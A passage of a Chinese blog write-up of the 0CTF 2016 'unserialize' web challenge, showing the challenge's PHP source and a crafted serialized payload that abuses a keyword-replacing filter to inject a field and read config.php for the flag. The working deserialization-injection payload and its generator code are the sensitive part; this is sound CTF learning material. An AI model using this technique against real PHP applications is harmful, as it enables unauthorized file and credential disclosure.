class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br></pre></td><td class="code"><pre><span class="line">class.php</span><br><span class="line">&lt;?php</span><br><span class="line">require(&#39;config.php&#39;);</span><br><span class="line"></span><br><span class="line">class user extends mysql&#123;</span><br><span class="line">    private $table &#x3D; &#39;users&#39;;</span><br><span class="line"></span><br><span class="line">    public function is_exists($username) &#123;</span><br><span class="line">        $username &#x3D; parent::filter($username);</span><br><span class="line"></span><br><span class="line">        $where &#x3D; &quot;username &#x3D; &#39;$username&#39;&quot;;</span><br><span class="line">        return parent::select($this-&gt;table, $where);</span><br><span class="line">    &#125;</span><br><span class="line">    public function register($username, $password) &#123;</span><br><span class="line">        $username &#x3D; parent::filter($username);</span><br><span class="line">        $password &#x3D; parent::filter($password);</span><br><span class="line"></span><br><span class="line">        $key_list &#x3D; Array(&#39;username&#39;, &#39;password&#39;);</span><br><span class="line">        $value_list &#x3D; Array($username, md5($password));</span><br><span class="line">        return parent::insert($this-&gt;table, $key_list, $value_list);</span><br><span class="line">    &#125;</span><br><span class="line">    public function login($username, $password) &#123;</span><br><span class="line">        $username &#x3D; parent::filter($username);</span><br><span class="line">        $password &#x3D; parent::filter($password);</span><br><span class="line"></span><br><span class="line">        $where &#x3D; &quot;username &#x3D; &#39;$username&#39;&quot;;</span><br><span class="line">        $object &#x3D; parent::select($this-&gt;table, $where);</span><br><span class="line">        if ($object &amp;&amp; $object-&gt;password &#x3D;&#x3D;&#x3D; md5($password)) &#123;</span><br><span class="line">            return true;</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            return false;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    public function show_profile($username) &#123;</span><br><span class="line">        $username &#x3D; parent::filter($username);</span><br><span class="line"></span><br><span class="line">        $where &#x3D; &quot;username &#x3D; &#39;$username&#39;&quot;;</span><br><span class="line">        $object &#x3D; parent::select($this-&gt;table, $where);</span><br><span class="line">        return $object-&gt;profile;</span><br><span class="line">    &#125;</span><br><span class="line">    public function update_profile($username, $new_profile) &#123;</span><br><span class="line">        $username &#x3D; parent::filter($username);</span><br><span class="line">        $new_profile &#x3D; parent::filter($new_profile);</span><br><span class="line"></span><br><span class="line">        $where &#x3D; &quot;username &#x3D; &#39;$username&#39;&quot;;</span><br><span class="line">        return parent::update($this-&gt;table, &#39;profile&#39;, $new_profile, $where);</span><br><span class="line">    &#125;</span><br><span class="line">    public function __tostring() &#123;</span><br><span class="line">        return __class__;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class mysql &#123;</span><br><span class="line">    private $link &#x3D; null;</span><br><span class="line"></span><br><span class="line">    public function connect($config) &#123;</span><br><span class="line">        $this-&gt;link &#x3D; mysql_connect(</span><br><span class="line">            $config[&#39;hostname&#39;],</span><br><span class="line">            $config[&#39;username&#39;], </span><br><span class="line">            $config[&#39;password&#39;]</span><br><span class="line">        );</span><br><span class="line">        mysql_select_db($config[&#39;database&#39;]);</span><br><span class="line">        mysql_query(&quot;SET sql_mode&#x3D;&#39;strict_all_tables&#39;&quot;);</span><br><span class="line"></span><br><span class="line">        return $this-&gt;link;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function select($table, $where, $ret &#x3D; &#39;*&#39;) &#123;</span><br><span class="line">        $sql &#x3D; &quot;SELECT $ret FROM $table WHERE $where&quot;;</span><br><span class="line">        $result &#x3D; mysql_query($sql, $this-&gt;link);</span><br><span class="line">        return mysql_fetch_object($result);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function insert($table, $key_list, $value_list) &#123;</span><br><span class="line">        $key &#x3D; implode(&#39;,&#39;, $key_list);</span><br><span class="line">        $value &#x3D; &#39;\&#39;&#39; . implode(&#39;\&#39;,\&#39;&#39;, $value_list) . &#39;\&#39;&#39;; </span><br><span class="line">        $sql &#x3D; &quot;INSERT INTO $table ($key) VALUES ($value)&quot;;</span><br><span class="line">        return mysql_query($sql);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function update($table, $key, $value, $where) &#123;</span><br><span class="line">        $sql &#x3D; &quot;UPDATE $table SET $key &#x3D; &#39;$value&#39; WHERE $where&quot;;</span><br><span class="line">        return mysql_query($sql);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function filter($string) &#123;</span><br><span class="line">        $escape &#x3D; array(&#39;\&#39;&#39;, &#39;\\\\&#39;);</span><br><span class="line">        $escape &#x3D; &#39;&#x2F;&#39; . implode(&#39;|&#39;, $escape) . &#39;&#x2F;&#39;;</span><br><span class="line">        $string &#x3D; preg_replace($escape, &#39;_&#39;, $string);</span><br><span class="line"></span><br><span class="line">        $safe &#x3D; array(&#39;select&#39;, &#39;insert&#39;, &#39;update&#39;, &#39;delete&#39;, &#39;where&#39;);</span><br><span class="line">        $safe &#x3D; &#39;&#x2F;&#39; . implode(&#39;|&#39;, $safe) . &#39;&#x2F;i&#39;;</span><br><span class="line">        return preg_replace($safe, &#39;hacker&#39;, $string);</span><br><span class="line">    &#125;</span><br><span class="line">    public function __tostring() &#123;</span><br><span class="line">        return __class__;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">session_start();</span><br><span class="line">$user &#x3D; new user();</span><br><span class="line">$user-&gt;connect($config);</span><br></pre></td></tr></table></figure>
<p>这段代码是核心代码，因为要从数据库查数据需要用到这段代码中的函数和规则，既然查数据要用到，那查flag肯定也要用到啊，那谁调用class呢？看代码开头，是config.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">config.php</span><br><span class="line">&lt;?php</span><br><span class="line">    $config[&#39;hostname&#39;] &#x3D; &#39;127.0.0.1&#39;;</span><br><span class="line">    $config[&#39;username&#39;] &#x3D; &#39;root&#39;;</span><br><span class="line">    $config[&#39;password&#39;] &#x3D; &#39;&#39;;</span><br><span class="line">    $config[&#39;database&#39;] &#x3D; &#39;&#39;;</span><br><span class="line">    $flag &#x3D; &#39;&#39;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>到这里，思路基本已经有了，就是我们需要读取config.php来获取flag，如何读取呢？</p>
<h2 id="0x03"><a href="#0x03" class="headerlink" title="0x03"></a>0x03</h2><p>到这里，我又想了想题目有哪些提示，对，就是标题，反序列化，那也就是说，序列化是我们一定要用到的，哪里出现了呢？在profile.php中出现了。我们通过源码看到profile通过update.php经过POST传入phone，email，nickname，photo四个参数，而其中的photo参数具有文件读取的函数功能，所以我们直接让它读取config.php文件即可获得flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">public function filter($string) &#123;</span><br><span class="line">        $escape &#x3D; array(&#39;\&#39;&#39;, &#39;\\\\&#39;);</span><br><span class="line">        $escape &#x3D; &#39;&#x2F;&#39; . implode(&#39;|&#39;, $escape) . &#39;&#x2F;&#39;;</span><br><span class="line">        $string &#x3D; preg_replace($escape, &#39;_&#39;, $string);</span><br><span class="line"></span><br><span class="line">        $safe &#x3D; array(&#39;select&#39;, &#39;insert&#39;, &#39;update&#39;, &#39;delete&#39;, &#39;where&#39;);</span><br><span class="line">        $safe &#x3D; &#39;&#x2F;&#39; . implode(&#39;|&#39;, $safe) . &#39;&#x2F;i&#39;;</span><br><span class="line">        return preg_replace($safe, &#39;hacker&#39;, $string);</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">if(preg_match(&#39;&#x2F;[^a-zA-Z0-9_]&#x2F;&#39;,$_POST[&#39;nickname&#39;])||strlen($_POST[&#39;nickname&#39;]) &gt; 10)</span><br><span class="line">            die(&#39;Invalid nickname&#39;);</span><br></pre></td></tr></table></figure>
<p>正常来说我们的序列化payload如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:1:&quot;b&quot;:4:&#123;s:5:&quot;phone&quot;;s:11:&quot;12345678901&quot;;s:5:&quot;email&quot;;s:10:&quot;123@qq.com&quot;;s:8:&quot;nickname&quot;;a:1:&#123;i:0;s:3:&quot;123&quot;;&#125;s:5:&quot;photo&quot;;s:10:&quot;config.php&quot;;&#125;</span><br></pre></td></tr></table></figure>
<p>由于变量进行了替换，那么替换后长度肯定会发生改变，在nickname之后的字符长度一共是34，那么我们完全可以用34个where来让它进行正则匹配替换，然后剩下的34个字符就不会被正则匹配，即下面代码，在反序列化时就会被成功当成photo，那么我们就可以成功读取到config.php了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;;&#125;s:5:&quot;photo&quot;;s:10:&quot;config.php&quot;;&#125;</span><br></pre></td></tr></table></figure>
<p>经过以上分析，写出如下序列化代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">class b</span><br><span class="line">&#123;</span><br><span class="line">    public $phone &#x3D; &quot;12345678901&quot;;</span><br><span class="line">    public $email &#x3D; &quot;123@qq.com&quot;;</span><br><span class="line">    public $nickname &#x3D; array(&quot;wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere&quot;);</span><br><span class="line">    public $photo &#x3D; &quot;config.php&quot;;</span><br><span class="line">&#125;</span><br><span class="line">$a&#x3D;new b();</span><br><span class="line">$profile &#x3D; serialize($a);</span><br><span class="line">echo $profile;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">O:1:&quot;b&quot;:4:&#123;s:5:&quot;phone&quot;;s:11:&quot;12345678901&quot;;s:5:&quot;email&quot;;s:10:&quot;123@qq.com&quot;;s:8:&quot;nickname&quot;;a:1:&#123;i:0;s:170:&quot;wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere&quot;;&#125;s:5:&quot;photo&quot;;s:10:&quot;config.php&quot;;&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200905122806700.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2h4aHhoeGh4eA==,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/20200905122403359.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2h4aHhoeGh4eA==,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>base编码后得出flag</p>

            </div>
            
                <div class="kratos-copyright text-center clearfix">
                    <h5>本作品采用 <a rel="license nofollow" target="_blank" href="http://creativecommons.org/licenses/by-sa/4.0/">知识共享署名-相同方式共享 4.0 国际许可协议</a> 进行许可</h5>
                </div>
            
            <footer class="kratos-entry-footer clearfix">
                
                    <div class="post-like-donate text-center clearfix" id="post-like-donate">
                    
                        <a class="donate" href="javascript:;"><i class="fa fa-bitcoin"></i> 打赏</a>
                    
                    
                        <a class="share" href="javascript:;"><i class="fa fa-share-alt"></i> 分享</a>
                        <div class="share-wrap" style="display: none;">
    <div class="share-group">
        <a href="javascript:;" class="share-plain qq" onclick="share('qq');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-qq"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain qzone" onclick="share('qzone');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-star"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain weixin pop style-plain" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-weixin"></i>
            </div>
            <div class="share-int">
                <div class="qrcode" id="wechat-qr"></div>
                <p>打开微信“扫一扫”，打开网页后点击屏幕右上角分享按钮</p>
            </div>
        </a>
        <a href="javascript:;" class="share-plain weibo" onclick="share('weibo');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-weibo"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain facebook style-plain" onclick="share('facebook');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-facebook"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain twitter style-plain" onclick="share('twitter');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-twitter"></i>
            </div>
        </a>
    </div>
    <script type="text/javascript">
        $(()=>{
            new QRCode("wechat-qr", {
                text: "http://wumingzhilian.github.to/2020/09/05/0ctf-2016-Web-unserialize/",
                width: 150,
                height: 150,
                correctLevel : QRCode.CorrectLevel.H
            });
        });
        function share(dest) {
            const qqBase        = "https://connect.qq.com/widget/shareqq/index.html?";
            const weiboBase     = "https://service.weibo.com/share/share.php?";
            const qzoneBase     = "https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?";
            const facebookBase  = "https://www.facebook.com/sharer/sharer.php?";
            const twitterBase   = "https://twitter.com/intent/tweet?";
            const hostUrl       = "http://wumingzhilian.github.to/2020/09/05/0ctf-2016-Web-unserialize/";
            const title         = "「wuming/unserialize」";
            const excerpt       = `0x01拿到题目第一件事是进行目录扫描，看看都有哪些目录，结果如下：

不少，首先有源码，我们直接下载下来，因为有源码去分析比什么都没有更容易分析出漏洞所在。
通过这个知道，它一共有这么几个页面，首页登录页面，注册页面，update更...`;
            let _URL;
            switch (dest) {
                case "qq"       : _URL = qqBase+"url="+hostUrl+"&title="+title+"&desc=&summary="+excerpt+"&site=cxpy";     break;
                case "weibo"    : _URL = weiboBase+"url="+hostUrl+"&title="+title+excerpt;                                 break;
                case "qzone"    : _URL = qzoneBase+"url="+hostUrl+"&title="+title+"&desc=&summary="+excerpt+"&site=cxpy";  break;
                case "facebook" : _URL = facebookBase+"u="+hostUrl;                                                        break;
                case "twitter"  : _URL = twitterBase+"text="+title+excerpt+"&url="+hostUrl;                                break;
            }
            window.open(_URL);
        };
    </script>
</div>
                    
                    </div>
                
                <div class="footer-tag clearfix">
                    <div class="pull-left">
                    <i class="fa fa-tags"></i>
                        <a class="tag-none-link" href="/tags/CTF/" rel="tag">CTF</a>
                    </div>
                    <div class="pull-date">
                    <span>最后编辑：2020-09-05</span>
                    </div>
                </div>
            </footer>
        </div>
        
            <nav class="navigation post-navigation clearfix" role="navigation">
                
                <div class="nav-previous clearfix">
                    <a title=" 攻防世界web进阶区Web_python_block_chain详解" href="/2020/08/20/攻防世界web进阶区Web-python-block-chain详解/">&lt; 上一篇</a>
                </div>
                
                
                <div class="nav-next clearfix">
                    <a title=" Sqli-labs 大完结" href="/2020/10/18/Sqli-labs-大完结/">下一篇 &gt;</a>
                </div>
                
            </nav>
        
        
            <div id="disqus_thread"></div>
<script>
    $(function(){
        window.DISQUS = null;
        new DisqusJS({
            shortname: '',
            siteName: '',
            identifier: '2020/09/05/0ctf-2016-Web-unserialize/',
            url: 'http://wumingzhilian.github.to/2020/09/05/0ctf-2016-Web-unserialize/',
            api: '',
            apikey: '',
            admin: '',
            adminLabel: ''
        });
    });
</script>
<noscript>Please enable JavaScript to view the <a target="_blank" rel="noopener" href="https://github.com/SukkaW/DisqusJS">comments powered by DisqusJS.</a></noscript>
        
    </article>
</section>
</div>
        
            <section id="kratos-widget-area" class="col-md-4 hidden-xs hidden-sm">
                
                    <aside id="krw-about" class="widget widget-kratos-about clearfix">
    
    <div class="photo-background"></div>
    <div class="photo-wrapper clearfix">
        <div class="photo-wrapper-tip text-center">
            <img class="about-photo" src="/images/avatar.png" />
        </div>
    </div>
    <div class="textwidget">
        
            <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x01"><span class="toc-number">1.</span> <span class="toc-text">0x01</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%99%BB%E9%99%86%E9%A1%B5%E9%9D%A2"><span class="toc-number">2.</span> <span class="toc-text">登陆页面</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%B3%A8%E5%86%8C"><span class="toc-number">3.</span> <span class="toc-text">注册</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03"><span class="toc-number">3.1.</span> <span class="toc-text">0x03</span></a></li></ol></li></ol>
        
    </div>
</aside>
                
                    <!-- Moved to about.ejs -->
                
                    
  <aside id="krw-categories" class="widget widget-categories clearfix">
    <h4 class="widget-title"><i class="fa fa-folder"></i>分类目录</h4>
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/">CTF</a><span class="category-list-count">17</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Sqli-labs/">Sqli-labs</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Sql%E6%B3%A8%E5%85%A5/">Sql注入</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/XSS-Labs/">XSS-Labs</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/sql%E6%B3%A8%E5%85%A5/">sql注入</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a><span class="category-list-count">4</span></li></ul>
  </aside>


                
                    
  <aside id="krw-tags" class="widget widget-kratos-tags clearfix">
    <h4 class="widget-title"><i class="fa fa-tags"></i>标签聚合</h4>
      <div class="tag-clouds">
        <a href="/tags/CTF/" style="font-size: 0.65em;">CTF</a> <a href="/tags/RCE/" style="font-size: 0.6em;">RCE</a> <a href="/tags/Sqli-labs/" style="font-size: 0.6em;">Sqli-labs</a> <a href="/tags/Sql%E6%B3%A8%E5%85%A5/" style="font-size: 0.6em;">Sql注入</a> <a href="/tags/WEB/" style="font-size: 0.6em;">WEB</a> <a href="/tags/XSS-Labs/" style="font-size: 0.6em;">XSS-Labs</a> <a href="/tags/burpsuit/" style="font-size: 0.6em;">burpsuit</a> <a href="/tags/sql%E6%B3%A8%E5%85%A5/" style="font-size: 0.6em;">sql注入</a> <a href="/tags/web%E8%BF%9B%E9%98%B6%E5%8C%BA/" style="font-size: 0.75em;">web进阶区</a> <a href="/tags/%E4%B8%87%E8%83%BD%E5%AF%86%E7%A0%81/" style="font-size: 0.6em;">万能密码</a> <a href="/tags/%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/" style="font-size: 0.6em;">信息搜集</a> <a href="/tags/%E5%8C%BA%E5%9D%97%E9%93%BE/" style="font-size: 0.6em;">区块链</a> <a href="/tags/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C/" style="font-size: 0.8em;">攻防世界</a> <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" style="font-size: 0.7em;">渗透测试</a>
      </div>
  </aside>

                
                    
  <aside id="krw-posts" class="widget widget-kratos-poststab">
  <h4 class="widget-title"><i class="fa fa-file"></i>最新文章</h4>
  <div class="tab-content">
      <ul class="list-group">
        
          <a class="list-group-item" href="/2020/10/18/Sql%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93%E5%AD%A6%E4%B9%A0/"><i class="fa  fa-book"></i> Sql注入总结学习</a>
        
          <a class="list-group-item" href="/2020/10/18/Sqli-labs-%E5%A4%A7%E5%AE%8C%E7%BB%93/"><i class="fa  fa-book"></i> Sqli-labs 大完结</a>
        
          <a class="list-group-item" href="/2020/09/05/0ctf-2016-Web-unserialize/"><i class="fa  fa-book"></i> wuming/unserialize</a>
        
          <a class="list-group-item" href="/2020/08/20/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Cweb%E8%BF%9B%E9%98%B6%E5%8C%BAWeb-python-block-chain%E8%AF%A6%E8%A7%A3/"><i class="fa  fa-book"></i> 攻防世界web进阶区Web_python_block_chain详解</a>
        
          <a class="list-group-item" href="/2020/08/19/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Cweb%E8%BF%9B%E9%98%B6%E5%8C%BAwtf-sh-150%E8%AF%A6%E8%A7%A3/"><i class="fa  fa-book"></i> 攻防世界web进阶区wtf.sh-150详解</a>
        
      </ul>
  </div>
  </aside>

                
            </section>
        
        </div>
    </div>
</div>
<footer>
    <div id="footer">
        <div class="kr-tool text-center">
            <div class="tool">
                
                    <div class="box search-box">
                        <a href="/search/">
                            <span class="fa fa-search"></span>
                        </a>
                    </div>
                
                
                    <div class="box theme-box" id="darkmode-switch">
                        <span class="fa fa-adjust"></span>
                    </div>
                
                
            </div>
            <div class="box gotop-box">
                <span class="fa fa-chevron-up"></span>
            </div>
        </div>
        <div class="container">
            <div class="row">
                <div class="col-md-6 col-md-offset-3 footer-list text-center">
                    <ul class="kratos-social-icons">
                        
                        
                        <li><a target="_blank" rel="nofollow" href="https://t.me/wumingzhilian"><i class="fa fa-telegram"></i></a></li>
                        <li><a target="_blank" rel="nofollow" href="https://twitter.com/wumingzhilian"><i class="fa fa-twitter"></i></a></li>
                        
                        
                        
                        <li><a target="_blank" rel="nofollow" href="https://github.com/wumingzhilian"><i class="fa fa-github"></i></a></li>
                        <li><a target="_blank" rel="nofollow" href="/atom.xml"><i class="fa fa-rss"></i></a></li>
                    </ul>
                    <ul class="kratos-copyright">
                        <div>
                            <li>&copy; 2020 wuming 版权所有.</li>
                            <li>本站已运行<span id="span_dt">Loading...</span></li>
                        </div>
                        <div>
                            <li>Theme <a href="https://github.com/Candinya/Kratos-Rebirth" target="_blank">Kratos:Rebirth</a></li>
                            <li>Made with <i class="fa fa-heart throb" style="color:#d43f57"></i> by <a href="https://candinya.com" target="_blank" rel="nofollow">Candinya</a>.</li>
                        </div>
                        <div>
                            <li>Hosted by <a href="https://github.io" target="_blank">Github Pages</a></li>
                            <li>Powered by <a href="https://hexo.io" target="_blank" rel="nofollow">Hexo</a></li>
                        </div>
                    </ul>
                </div>
            </div>
        </div>
    </div>
</footer>
</div>
</div>
<script defer src="https://cdn.jsdelivr.net/npm/bootstrap@3.3.4/dist/js/bootstrap.min.js"></script>
<script defer src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.js"></script>
<script>const notMobile = (!(navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i)));</script>

<script async src="/js/candy.min.js"></script>

    <script src="https://cdn.jsdelivr.net/npm/aplayer@1.10.1/dist/APlayer.min.js"></script>
    <div id="aplayer"></div>
<script>
$.ajax({
    type:"get",
    url:"",
    dataType:"json",
    success: function(data){
        new APlayer({
            container: document.getElementById('aplayer'),
            fixed: true,
            order: 'random',
            lrcType: 3,
            audio: data
        });
    }
});
</script>


    <script defer src="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>

<script defer src="/js/kratosr.min.js"></script>
<script defer src="/js/pjax.min.js"></script>

    <script defer src="/js/kr-dark.min.js"></script>



</body>
</html>